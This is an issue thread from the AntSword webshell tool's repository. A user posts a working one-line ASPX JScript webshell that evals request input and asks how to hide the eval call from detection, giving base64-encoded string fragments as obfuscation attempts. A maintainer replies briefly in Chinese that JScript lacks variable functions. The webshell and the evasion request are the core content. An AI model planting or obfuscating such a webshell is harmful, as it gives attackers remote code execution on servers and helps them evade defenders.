### ISSUE TITLE
hide eval

### ISSUE THREAD

**Issue by b4sh1t1** [AntSwordProject/antSword#290]
Hello;

How we can hide the eval function ?

`<%@ Page Language="Jscript"%> <% eval(Request.Item["ant"],"unsafe"); %>
`
ex 1:
`var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0="));
`
ex 2:
`var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
`
but i'm not understand the how-to of this;

Thanks.

**Comment by yzddmr6** [comment]
Jscript不支持变量函数
